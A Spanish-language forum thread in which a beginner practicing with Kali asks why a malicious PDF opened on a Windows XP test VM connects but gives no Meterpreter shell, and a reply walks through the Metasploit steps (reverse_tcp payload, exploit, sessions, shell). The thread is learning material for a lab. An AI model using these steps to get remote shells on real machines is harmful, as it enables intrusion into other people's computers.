hola amigos buenas noches .. vengo por una duda estoy practicando recién entro en el mundo de la seguridad informática muy humildemente vengo por una ayuda por cuando ejecuto en el sistema operativo ataque el archivo pdf , pero en la sesión del kali me aparece conectado y abierto pero no pasa de hay? no aparece metepreter para entrar a la shell a esto me refiero gracias
(https://imageshack.com/a/img922/5227/2irYqO.png)
Primero que nada no se entiente bien tu pregunta, asi q voy a tratar de responder deacuerdo a lo q veo en tu imagen. Si estas trabajando con un solo objetivo (WinXP en VM) no deberias tener 4 sesiones esperando conexion, para estar recien empezando te puede confundir. O si estas explotando mas de una vulnerabilidad usa "-j" para moverte a una sesion especifica. Ahora usa "run" en lugar de "shell", tambien te aconsejo q revises desde el principio tanto tu explotacion como la documentacion que esta tiene.
Saludos...............
amigo la sesión que dice 4 es por cada vez que en el equipo al cual estoy realizando el ataque abría el archivo pdf y marca como 4 veces y lo que sucede amigo es que en la documentación que estoy guiando la persona al realizar este ultimo pase se la abre la sesión en la shell de meterpreter pero como tu ves se me conecta para no me abre... para en ese momento darle shell cuando escribio cualquier cosa en la cosa o doy un espacio se devuelve a msf exploit (handler) gracias
Para abrir una shell:
set payload windows/meterpreter/reverse_tcp
luego
show options
tienes q visualizar las opciones de "Payload options (windows/meterpreter/reverse_tcp):" que tiene q ser igual a tu pdf.
luego (aqui empieza tu imagen)
exploit
va correr las primeras 7 lineas de tu imagen y vuelve al handler
luego
sessions -i 1
con eso deberias posicionarte en meterpreter, escribes "help"
luego
shell
y listo ya tienes la shell en tu terminal